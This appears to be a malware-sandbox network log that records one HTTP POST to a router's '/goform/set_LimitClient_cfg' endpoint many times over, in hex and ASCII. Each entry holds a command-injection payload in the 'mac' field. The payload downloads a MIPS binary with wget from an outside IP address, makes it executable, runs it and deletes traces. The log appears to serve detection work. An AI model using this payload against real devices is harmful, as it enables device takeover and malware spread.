                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
